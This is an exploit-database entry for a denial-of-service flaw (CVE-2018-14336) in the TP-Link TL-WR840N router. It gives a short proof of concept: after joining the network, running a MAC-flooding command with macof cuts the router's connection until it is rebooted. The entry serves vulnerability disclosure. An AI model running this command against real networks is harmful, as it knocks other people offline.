Lucene search

K
exploitpackAniket DindaEXPLOITPACK:74A707CE2E80F0A53A23EBCE4E588EF2
HistoryJul 20, 2018 - 12:00 a.m.

TP-Link TL-WR840N - Denial of Service

2018-07-2000:00:00
Aniket Dinda
30

0.079 Low

EPSS

Percentile

94.3%

TP-Link TL-WR840N - Denial of Service

# Exploit Title:- TP-Link Wireless N Router WR840N - Buffer Overflow
# Date:- 2018-07-16
# Vendor Homepage:- https://www.tp-link.com/
# Hardware Link:-  https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
# Version:- TP-Link Wireless N Router WR840N
# Category:- Hardware
# Exploit Author:-  Aniket Dinda
# Tested on:- Linux
# CVE:- CVE-2018-14336

**********************************************************************************************************
Proof Of Concept:-

1- First connect to this network
2- Open terminal => And Type  "macof -i eth0 -n 10"
3- Hit Enter
4- You will see that your Net connection will lost.
******************************************************************************************************
Solutions:
1- You have to Reboot your router .

0.079 Low

EPSS

Percentile

94.3%

Related for EXPLOITPACK:74A707CE2E80F0A53A23EBCE4E588EF2